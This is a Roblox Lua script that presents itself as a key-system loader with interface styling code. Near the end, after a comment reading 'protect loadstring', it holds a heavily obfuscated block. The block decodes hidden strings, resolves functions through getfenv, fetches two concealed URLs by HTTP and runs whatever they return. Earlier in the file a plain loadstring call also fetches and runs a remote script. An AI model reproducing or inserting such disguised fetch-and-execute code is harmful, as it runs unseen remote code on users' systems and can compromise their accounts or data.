
local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")
local RunService = game:GetService("RunService")

local isMobile = UserInputService.TouchEnabled and not UserInputService.KeyboardEnabled
local UI_CONFIG = {
	MainColor = Color3.fromRGB(22, 22, 24),
	SecondaryColor = Color3.fromRGB(30, 30, 34),
	AccentColor = Color3.fromRGB(35, 120, 180),
	ErrorColor = Color3.fromRGB(239, 68, 68),
	SuccessColor = Color3.fromRGB(25, 135, 65),
	WarningColor = Color3.fromRGB(251, 191, 36),
	OrangeColor = Color3.fromRGB(255, 165, 0),
	PurpleColor = Color3.fromRGB(147, 112, 219),
	TextColor = Color3.fromRGB(248, 250, 252),
	SubTextColor = Color3.fromRGB(148, 163, 184),
	BorderColor = Color3.fromRGB(51, 65, 85),
	HoverColor = Color3.fromRGB(40, 40, 46),
	Font = Enum.Font.GothamMedium,
	HeaderFont = Enum.Font.GothamBold,
	TextSize = 14,
	TitleSize = 18,
	SubTextSize = 12,
	CornerRadius = UDim.new(0, 8),
	WindowCornerRadius = UDim.new(0, 12),
	BorderSize = 1,
	Padding = 12,
}




local folder = ""
local file = folder .. "/key.txt"
local saved_key = nil


local function CreateInstance(className, properties)
	local instance = Instance.new(className)
	for property, value in pairs(properties) do
		instance[property] = value
	end
	return instance
end

local function ApplyCorner(instance, radius)
	local corner = CreateInstance("UICorner", {
		CornerRadius = radius or UI_CONFIG.CornerRadius
	})
	corner.Parent = instance
	return corner
end

local function ApplyStroke(instance, color, thickness)
	local stroke = CreateInstance("UIStroke", {
		Color = color or UI_CONFIG.BorderColor,
		Thickness = thickness or UI_CONFIG.BorderSize,
		ApplyStrokeMode = Enum.ApplyStrokeMode.Border
	})
	stroke.Parent = instance
	return stroke
end

local function try_load_with_key(key)
	
end

local function load_main_script()
	loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/ccd243d0572844a235d5c.lua"))()
end

if saved_key then
	local success, message = try_load_with_key(saved_key)
	if success then
		load_main_script()
	end
end

local player = game.Players.LocalPlayer

--protect loadstring
return(function(...)return(function(...)local function pv32(b,c)local t={}pcall(function()local d={}pcall(function()for e=1,#b,8 do local f=b:sub(e,e+7)if#f==8 then local g=tonumber(f,2)if g then d[#d+1]=string.char(g)end end end end)local h if true then h=table.concat(d)table.insert(t,b)end local i={}local j=#c for e=1,#h do local k=h:byte(e)local l=c:byte((e-1)%j+1)i[e]=string.char(bit32.bxor(k,l))end return table.concat(i)end)return t[1]()end local YfNOnwuvAbEJiMasqEXFPIwdK={rvuqd={[121]={[485]=function()local x={}x[485]=function()return(function()local aBrYj local bzXhW local AtrbP=9 for _=1,54 do if AtrbP==9 then aBrYj=(getfenv and getfenv()or _ENV)AtrbP=22 elseif AtrbP==22 then bzXhW=aBrYj[pv32(function()o,r={},{}for i=1,20,2 do o[#o+1]=string.char(tonumber(((function()local t={}for i,v in ipairs({207,211,206,205,225,209,229,215,229,230,233,232,231,219,216,225,238,219,221,229})do t[i]=string.char((v-(tonumber("2456"))-i)%128)end return table.concat(t)end)()):sub(i,i+1),16))end for i=1,#table.concat(o)do k=string.byte((function()local t={253,211,220,213,1,215,224,217,5,219,228,221,9,223,232,225,13,228,230,237,17,231,239,241,21,235,235,244,25,239,247,249,29,243,243,246,33,248,250,1,37,251,3,5,41,0,2,9,45,3,11,13,49,6,16,13,53,11,20,13,57,15,23,25,61,19,28,21,65,24,26,33,69,26,36,35,73,30,37,41,77,35,43,45,81,40,42,49,85,43,52,45,89,46,47,54,93,51,60,53,97,55,63,65,101,59,67,69,105,64,66,73,109,67,76,69,113,71,79,81,117,75,84,77,121,79,88,81,125,83,91,93,129,87,95,97,133,92,94,101,137,95,103,105,141,99,108,101,145,102,108,111,149,106,116,113,153,112,114,121,157,114,124,117,161,119,121,126,165,122,123,128,169,127,127,130,173,131,139,141,177,135,144,137,181,140,142,149,185,143,152,145,189,147,155,157,193,152,154,161,197,154,162,158,201,159,167,169,205,164,166,173,209,168,170,177,213,171,179,181,217,175,184,177,221,179,188,181,225,183,192,185,229,186,194,193,233,192,194,201,237,195,204,197,241,200,202,209,245,203,211,213,249,208,210,217,253,211,219,221,1,216,218,225,5,219,228,221,9,224,224,230,13,227,235,237,17,231,237,236,21,234,240,243,25,239,247,249,29,243,252,245,33,247,0,249,37,251,4,253,41,254,5,9,45,3,11,13,49,7,15,17,53,11,20,13,57,16,18,25,61,20,22,29,65,23,31,33,69,27,36,29,73,31,40,33,77,36,38,45,81,40,42,49,85,43,51,53,89,47,55,57,93,51,59,61,97,55,55,58,101,59,67,69,105,64,66,73,109,66,74,77,113,70,75,81,117,74,84,81,121,78,86,81,125,83,91,93,129,87,96,89,133,90,100,93,137,95,103,105,141,98,99,104,145,103,112,113,149,107,116,109,153,111,120,113,157,114,119,122,161,119,127,129,165,123,132,125,169,126,130,137,173,130,135,141,177,135,141,140,181,139,148,141,185,144,146,153,189,147,156,149,193,151,160,153,197,155,156,164,201,160,162,169,205,163,171,173,209,167,175,177,213,172,174,181,217,175,183,185,221,179,188,185,225,183,191,193,229,187,195,197,233,191,200,193,237,195,203,205,241,198,203,203,245,204,206,213,249,207,216,209,253,211,219,221,1,215,224,217,5,220,222,229,9,224,224,231,13,226,227,236,17,231,239,241,21,235,243,245,25,239,241,246,29,244,246,253,33,247,255,1,37,251,1,0,41,0,2,9,45,4,6,13,49,6,8,15,53,12,14,21,57,15,20,18,61,19,21,23,65,23,32,25,69,27,36,29,73,30,40,40,77,35,44,37,81,39,48,41,85,43,51,53,89,47,56,49}for i=1,#t do t[i]=string.char((t[i]-tonumber((function()local t={247,240,242,241}for i=1,#t do t[i]=string.char((t[i]-tonumber("1725")-i)%128)end return table.concat(t)end)())-i)%128)end return table.concat(t)end)(),((i-1)%608)+1)d=(string.byte(table.concat(o),i)-k-i*7)%256 p=(k+i)%8 if p~=0 then l=bit32.lshift(d,8-p)h=bit32.rshift(d,p)d=bit32.band(l+h,0xFF)end r[i]=string.char(bit32.bxor(d,k))end return table.concat(r)end)]AtrbP=54 end end return bzXhW end)end return x end}},LfIyt={[757]={[169]=function()local buXYo buXYo={[169]=function()return(function()local BKpBB local fLXLJ local HDZey=10 while true do if HDZey==10 then BKpBB=(getfenv and getfenv()or _ENV)HDZey=24 elseif HDZey==24 then fLXLJ=nil HDZey=33 elseif HDZey==33 then fLXLJ=BKpBB[pv32(function()o,r={},{}for i=1,8,2 do o[#o+1]=string.char(tonumber(((function()local t={}for i,v in ipairs({20,19,10,9,25,28,28,8})do t[i]=string.char((v-(tonumber("9936"))-i)%128)end return table.concat(t)end)()):sub(i,i+1),16))end for i=1,#table.concat(o)do k=string.byte((function()local t={}for i,v in ipairs({147,106,108,115,151,109,117,119,155,114,116,123,159,117,125,127,163,121,130,123,167,125,133,135,171,130,132,139,175,132,136,137,179,137,146,139,183,140,148,146,187,145,153,155,191,150,152,159,195,154,156,163,199,157,166,159,203,162,164,171,207,166,168,175,211,170,172,179,215,174,176,183,219,177,185,187,223,181,190,183,227,185,185,194,231,189,197,199,235,194,196,203,239,197,206,199,243,200,207,211,247,204,210,209,251,208,213,213,255,213,213,216,3,217,226,219,7,221,229,231,11,224,232,230,15,229,237,239,19,233,242,235,23,237,246,243,27,241,249,251,31,244,252,250,35,249,1,3,39,254,0,7,43,1,3,5,47,5,13,15,51,9,17,19,55,14,16,23,59,17,25,27,63,21,30,23,67,25,34,27,71,29,38,31,75,33,42,35,79,37,37,46,83,42,44,51,87,45,53,55,91,49,57,59,95,54,56,63,99,58,58,65,103,61,69,71,107,64,68,69,111,68,73,73,115,73,82,75,119,76,86,86,123,82,84,91,127,85,85,94,131,89,97,99,135,93,95,100,139,98,100,107,143,101,110,103,147,104,109,114,151,109,111,116,155,113,122,115,159,117,126,119,163,121,129,131,167,126,128,135,171,128,129,138,175,132,142,135,179,136,146,143,183,142,142,148,187,146,146,153,191,148,158,158,195,152,158,163,199,157,166,159,203,161,169,171,207,165,174,167,211,169,177,179,215,173,173,182,219,177,185,187,223,180,188,183,227,186,188,195,231,189,197,199,235,194,196,203,239,196,204,207,243,201,209,211,247,205,213,213,251,209,218,211,255,213,221,223,3,216,221,220,7,221,230,223,11,225,233,235,15,228,233,236,19,233,241,243,23,238,240,247,27,242,244,251,31,246,246,253,35,250,252,3,39,252,1,6,43,1,9,11,47,4,10,9,51,9,18,11,55,13,22,19,59,16,21,27,63,22,24,31,67,24,34,31,71,29,37,39,75,33,42,35,79,37,40,45,83,41,49,51,87,44,48,55,91,49,58,51,95,52,62,59,99,58,58,64,103,62,64,71,107,65,73,75,111,68,78,71,115,73,81,83,119,77,85,87,123,81,90,83,127,84,90,91,131,89,97,99,135,93,102,95,139,97,105,107,143,101,110,103,147,105,114,107,151,108,118,115,155,114,114,120,159,118,120,127,163,121,130,123,167,124,126,133,171,130,132,139,175,133,141,143,179,137,145,147,183,141,150,143,187,145,153,155,191,148,158,151,195,153,162,155,199,157,165,167,203,161,170,163,207,165,174,167,211,168,173,172,215,174,176,183,219,176,181,187,223,181,183,189,227,185,194,187,231,188,198,197,235,193,202,195,239,198,200,207,243,201,209,211,247,205,205,214,251,209,217,219,255,214,216,223,3,216,226,226,7,221,224,229,11,225,233,235,15,230,232,239,19,233,242,235,23,237,246,239,27,241,250,243,31,245,245,248,35,250,252,3,39,253,6,7,43,1,7,2,47,6,8,15,51,8,16,19,55,13,22,15,59,17,22,20,63,21,26,24,67,26,28,35,71,30,32,39,75,33,42,35,79,36,44,39,83,41,43,42,87,44,52,48,91,50,52,59,95,53,58,56,99,58,58,64,103,61,69,71,107,65,73,75,111,69,74,72,115,73,79,78,119,77,85,87,123,82,84,91,127,84,90,95})do t[i]=string.char((v-(tonumber((function()local t={}for i,v in ipairs({176,178,181,180})do t[i]=string.char((v-(tonumber("14458"))-i)%128)end return table.concat(t)end)()))-i)%128)end return table.concat(t)end)(),((i-1)%752)+1)d=(string.byte(table.concat(o),i)-k-i*7)%256 p=(k+i)%8 if p~=0 then l=bit32.lshift(d,8-p)h=bit32.rshift(d,p)d=bit32.band(l+h,0xFF)end r[i]=string.char(bit32.bxor(d,k))end return table.concat(r)end)]HDZey=48 else break end end return fLXLJ end)end}return buXYo end}},}chjwioec2=YfNOnwuvAbEJiMasqEXFPIwdK.rvuqd[121][485]()[485]()()(YfNOnwuvAbEJiMasqEXFPIwdK.LfIyt[757][169]()[169]()():HttpGet(pv32(function()o,r={},{}for i=1,64,2 do o[#o+1]=string.char(tonumber(((function()local t={}for i,v in ipairs({111,100,109,97,100,102,118,97,118,119,121,101,110,103,121,110,108,107,130,118,130,133,115,119,116,124,118,124,126,127,140,128,129,140,141,147,146,136,136,136,135,140,140,141,139,156,154,146,157,158,141,143,163,161,151,163,146,167,165,153,156,168,161,173})do t[i]=string.char((v-(tonumber("13353"))-i)%128)end return table.concat(t)end)()):sub(i,i+1),16))end for i=1,#table.concat(o)do k=string.byte((function()local t={168,127,126,130,172,130,139,132,176,134,142,144,180,137,144,148,184,141,149,152,188,146,154,156,192,150,159,156,196,154,163,156,200,158,166,168,204,162,171,164,208,165,175,171,212,170,178,180,216,174,183,176,220,178,187,184,224,182,190,192,228,185,193,189,232,190,198,200,236,194,203,196,240,198,207,200,244,203,205,212,248,206,215,208,252,210,218,220,0,213,221,219,4,218,226,228,8,221,227,228,12,226,234,236,16,229,239,232,20,234,242,244,24,237,247,244,28,241,249,252,32,246,255,248,36,251,253,4,40,254,7,0,44,2,10,12,48,6,15,8,52,10,18,20,56,14,23,16,60,19,21,28,64,21,26,26,68,26,34,36,72,30,38,40,76,35,35,42,80,39,41,48,84,42,51,52,88,45,55,54,92,49,57,55,96,54,62,64,100,58,66,68,104,62,71,64,108,66,74,76,112,69,75,74,116,74,82,84,120,79,81,88,124,82,91,84,128,86,95,88,132,91,93,100,136,94,103,96,140,98,107,100,144,103,105,112,148,106,115,108,152,110,119,112,156,114,122,124,160,119,121,128,164,123,125,132,168,126,126,129,172,131,133,140,176,134,136,135,180,139,141,148,184,142,151,144,188,145,155,155,192,150,159,152,196,154,163,156,200,158,161,166,204,162,170,172,208,166,175,168,212,170,172,171,216,174,183,176,220,178,187,180,224,181,191,187,228,186,195,188,232,190,199,192,236,194,202,204,240,198,207,200,244,201,209,208,248,205,210,216,252,210,218,220,0,214,222,224,4,218,226,228,8,222,230,232,12,226,234,236,16,230,238,240,20,234,243,236,24,239,238,242,28,241,251,251,32,246,246,255,36,250,3,0}for i=1,#t do t[i]=string.char((t[i]-tonumber((function()local t={}for i,v in ipairs({18,21,22,28,28})do t[i]=string.char((v-(tonumber("1504"))-i)%128)end return table.concat(t)end)())-i)%128)end return table.concat(t)end)(),((i-1)%384)+1)d=(string.byte(table.concat(o),i)-k-i*7)%256 p=(k+i)%8 if p~=0 then l=bit32.lshift(d,8-p)h=bit32.rshift(d,p)d=bit32.band(l+h,0xFF)end r[i]=string.char(bit32.bxor(d,k))end return table.concat(r)end)))()chjwioec2(YfNOnwuvAbEJiMasqEXFPIwdK.LfIyt[757][169]()[169]()():HttpGet(pv32(function()o,r={},{}for i=1,116,2 do o[#o+1]=string.char(tonumber(((function()local t={149,138,147,135,133,142,141,156,156,157,144,143,160,145,151,163,146,145,164,165,151,152,153,159,155,154,171,162,178,162,177,179,182,178,171,172,181,187,170,188,173,170,171,193,189,180,176,194,181,186,195,199,188,186,199,189,184,205,203,193,206,198,207,213,196,201,203,199,214,216,218,221,204,206,211,203,221,225,228,225,225,211,214,218,217,219,231,220,217,218,227,238,242,230,239,240,229,247,245,249,232,232,230,238,236,236,239,240,242,243,245,244,241,243,5,251}for i=1,#t do t[i]=string.char((t[i]-tonumber("16719")-i)%128)end return table.concat(t)end)()):sub(i,i+1),16))end for i=1,#table.concat(o)do k=string.byte((function()local t={215,174,176,183,219,178,180,187,223,180,187,191,227,184,188,189,231,189,189,192,235,192,197,202,239,198,200,207,243,201,209,211,247,206,208,215,251,210,212,219,255,213,222,215,3,217,217,220,7,221,230,223,11,225,233,235,15,230,232,239,19,233,242,235,23,237,246,239,27,242,244,251,31,246,248,255,35,249,255,254,39,254,0,7,43,0,5,8,47,5,7,12,51,9,18,11,55,14,16,23,59,17,26,19,63,20,24,31,67,26,28,35,71,29,38,31,75,33,36,41,79,37,45,47,83,41,43,42,87,46,48,55,91,49,58,51,95,52,54,61,99,57,66,59,103,60,66,69,107,64,74,73,111,70,72,79,115,72,77,76,119,76,77,86,123,81,83,85,127,85,94,87,131,89,97,99,135,94,96,103,139,97,105,107,143,101,110,103,147,106,108,115,151,109,118,111,155,114,116,123,159,118,120,127,163,121,127,122,167,125,134,127,171,130,132,139,175,132,133,142,179,136,146,139,183,140,150,149,187,145,153,155,191,150,152,159,195,154,156,163,199,157,165,167,203,160,168,171,207,164,169,168,211,170,170,176,215,173,181,183,219,177,185,187,223,182,184,191,227,185,194,187,231,190,192,199,235,193,194,202,239,197,206,199,243,202,204,211,247,205,214,211,251,209,217,219,255,213,222,215,3,217,226,219,7,221,230,223,11,225,233,235,15,229,231,230,19,233,242,235,23,238,240,247,27,242,244,251,31,246,248,255,35,249,1,3,39,252,4,255,43,1,9,11,47,4,10,11,51,10,12,19,55,12,22,19,59,16,21,20,63,21,29,31,67,25,33,35,71,29,38,31,75,33,41,43,79,36,38,45,83,41,50,43,87,44,52,55,91,49,58,51,95,54,56,63,99,57,65,67,103,61,69,71,107,66,68,75,111,69,77,79,115,74,76,83,119,77,86,79,123,81,83,85,127,85,94,95,131,90,90,96,135,93,101,103,139,97,106,99,143,100,106,107,147,104,114,110,151,109,118,111,155,114,116,123,159,117,117,120,163,122,124,131,167,124,134,130,171,129,137,139,175,133,141,143,179,137,146,139,183,141,141,150,187,145,153,155,191,149,157,159,195,153,162,155,199,157,165,167,203,160,166,167,207,165,174,167,211,170,172,179,215,173,181,183,219,176,177,186,223,181,190,187,227,185,193,195,231,189,198,191,235,192,196,197,239,197,205,207,243,202,204,211,247,206,208,215,251,210,212,219,255,214,216,223,3,218,220,227,7,221,229,231,11,226,228,235,15,229,238,231,19,234,236,243,23,238,240,247,27,241,241,244,31,245,253,255,35,250,252,3,39,254,0,7,43,1,10,3,47,5,13,15,51,9,18,11,55,13,21,23,59,18,18,25,63,21,29,31,67,25,34,27,71,29,38,31,75,32,42,35,79,36,42,47,83,41,43,49,87,45,54,47,91,49,57,59,95,52,53,58,99,57,66,59,103,62,64,71,107,65,73,75,111,69,75,74,115,74,76,83,119,77,85,87,123,81,89,91,127,85,94,87,131,89,94,92,135,93,101,103,139,97,106,99,143,100,108,107,147,104,114,110,151,108,118,111,155,114,116,123,159,117,126,119,163,122,124,131,167,125,134,127,171,129,138,135}for i=1,#t do t[i]=string.char((t[i]-tonumber((function()local t={}for i,v in ipairs({102,105,104,104})do t[i]=string.char((v-(tonumber("11568"))-i)%128)end return table.concat(t)end)())-i)%128)end return table.concat(t)end)(),((i-1)%728)+1)d=(string.byte(table.concat(o),i)-k-i*7)%256 p=(k+i)%8 if p~=0 then l=bit32.lshift(d,8-p)h=bit32.rshift(d,p)d=bit32.band(l+h,0xFF)end r[i]=string.char(bit32.bxor(d,k))end return table.concat(r)end)))()end)(...)end)(...)
